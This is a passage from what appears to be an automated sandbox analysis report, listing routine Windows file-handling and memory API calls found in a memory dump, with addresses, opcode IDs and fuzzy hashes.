                                                                                                                                                                    • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                                                                                    • FindCloseChangeNotification.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: File$ChangeCloseCreateFindNotificationTime
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1631957507-0
                                                                                                                                                                    • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                                                                                    • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                                                                                                                                                    • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                                                                                    • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

APIs
Strings
• failed to allocate %u bytes of memory, xrefs: 004152F0
Memory Dump Source
• Source File: 00000005.00000002.1794572867.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1794572867.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000005.00000002.1794572867.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000005.00000002.1794572867.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_lhgtogaW.jbxd
Similarity
• API ID: malloc
• String ID: failed to allocate %u bytes of memory
• API String ID: 2803490479-1168259600
• Opcode ID: 331d9f3b8e40439b36498a1be208f9c7b855b07c1663acfa81ecf9407a5950a4
• Instruction ID: 0aa28a7b77b2060330bf56ee6aba3953d7f003d38adef6953018dc3bb0cf108c
• Opcode Fuzzy Hash: 331d9f3b8e40439b36498a1be208f9c7b855b07c1663acfa81ecf9407a5950a4
• Instruction Fuzzy Hash: 0FE026B7F01A12A3C200561AFD01AC677919FC132572B013BF92CD36C1E638D896C7A9
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000005.00000002.1794572867.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1794572867.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000005.00000002.1794572867.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000005.00000002.1794572867.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_lhgtogaW.jbxd
Similarity
• API ID: ??3@
• String ID:
• API String ID: 613200358-0
• Opcode ID: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
• Instruction ID: 7f33cc2486ffea160e999b9abaf125df84647c5341351ad01334bd221cd3bada
• Opcode Fuzzy Hash: cbd9f9e03ce833727f217058398efad0a096bf54ba10072877aeedcd786ebb4c
• Instruction Fuzzy Hash: 32D042B0404B008ED7B0DF39D401602BBF0AB093143118D2E90AAC2A50E775A0149F08
Uniqueness

Uniqueness Score: -1.00%

APIs
• SetFilePointerEx.KERNELBASE(0040627C,?,?,00000000,00000000,00000000,004068F9,00000000,00000000,?,00000000,0040627C), ref: 004062C2
  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
Memory Dump Source
• Source File: 00000005.00000002.1794572867.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1794572867.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000005.00000002.1794572867.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000005.00000002.1794572867.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_lhgtogaW.jbxd
Similarity
• API ID: File$PointerRead
• String ID:
• API String ID: 3154509469-0
• Opcode ID: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
• Instruction ID: d794e9b43e5f56b2d2e2073d65b81241c22a9a75ad02cc9b2284f18e77a2fe0f
• Opcode Fuzzy Hash: f15afef8f4b97f48ba7652cd85e3a24bc41a353f13de395cadc5358a8aad8795
• Instruction Fuzzy Hash: 45E01276100100FFE6619B05DC06F57FBB9FBD4710F14883DB59596174C6326851CB25
Uniqueness

Uniqueness Score: -1.00%

APIs
• ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
Memory Dump Source
• Source File: 00000005.00000002.1794572867.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1794572867.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000005.00000002.1794572867.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000005.00000002.1794572867.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_lhgtogaW.jbxd
Similarity
• API ID: FileRead
• String ID:
• API String ID: 2738559852-0
• Opcode ID: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
• Instruction ID: df780c2d30ec27a436fe2e8938b9b3026ee6fdf868a35847a3a0dbf755fefbc9
• Opcode Fuzzy Hash: 954c46e0e75d823fede48ea8c55c2feae074eed5d1d1543d384a91c6a040f523
• Instruction Fuzzy Hash: 6DD0C97505020DFBDF01CF81DC06FDD7B7DFB05359F108054BA0095060C7759A15AB55
Uniqueness

Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000005.00000002.1794572867.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1794572867.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000005.00000002.1794572867.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000005.00000002.1794572867.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_lhgtogaW.jbxd
Similarity
• API ID: ??3@
• String ID:
• API String ID: 613200358-0
• Opcode ID: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
• Instruction ID: 6ff791ec813821c2e9e24527ebed0d702daabad41f6d5d50af9b89e3d4ad0470
• Opcode Fuzzy Hash: ffbe44a51c26d842ca56a491b3c7d92fb1c4d2adc00a6a519549e0909776451f
• Instruction Fuzzy Hash: ADC09BB15117014BE7305F15D40471373D49F11727F318C1DA5D1914C2D77CD4408518
Uniqueness

Uniqueness Score: -1.00%

APIs
  • Part of subcall function 00406294: CloseHandle.KERNEL32(000000FF,00406224,00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF), ref: 0040629C
  • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
• GetLastError.KERNEL32(00000000,00000000,0040E03C,?,00000000,00000104,00000000,?,?,?,0040E521,?,0040E6A3,000000FF,?,00000104), ref: 00406281
  • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
Memory Dump Source
• Source File: 00000005.00000002.1794572867.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000005.00000002.1794572867.0000000000459000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000005.00000002.1794572867.000000000045D000.00000040.80000000.00040000.00000000.sdmp
• Associated: 00000005.00000002.1794572867.0000000000473000.00000040.80000000.00040000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_lhgtogaW.jbxd
Similarity
• API ID: File$CloseCreateErrorHandleLastRead
• String ID:
• API String ID: 2136311172-0
• Opcode ID: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
• Instruction ID: 5eec059ee86d0bbb8aaa5289f200f29bbda103cdac5cb86a40c163b72aa3aa4c
• Opcode Fuzzy Hash: b6bd1096ce10d17f9a7701a6d0a27b928aedeb77931263aba22673ea05e1db24
• Instruction Fuzzy Hash: 3F01D6B14017018FD7206B70CD05BA273D8EF10319F11897EE55BE62D1EB3C9861866E
Uniqueness

Uniqueness Score: -1.00%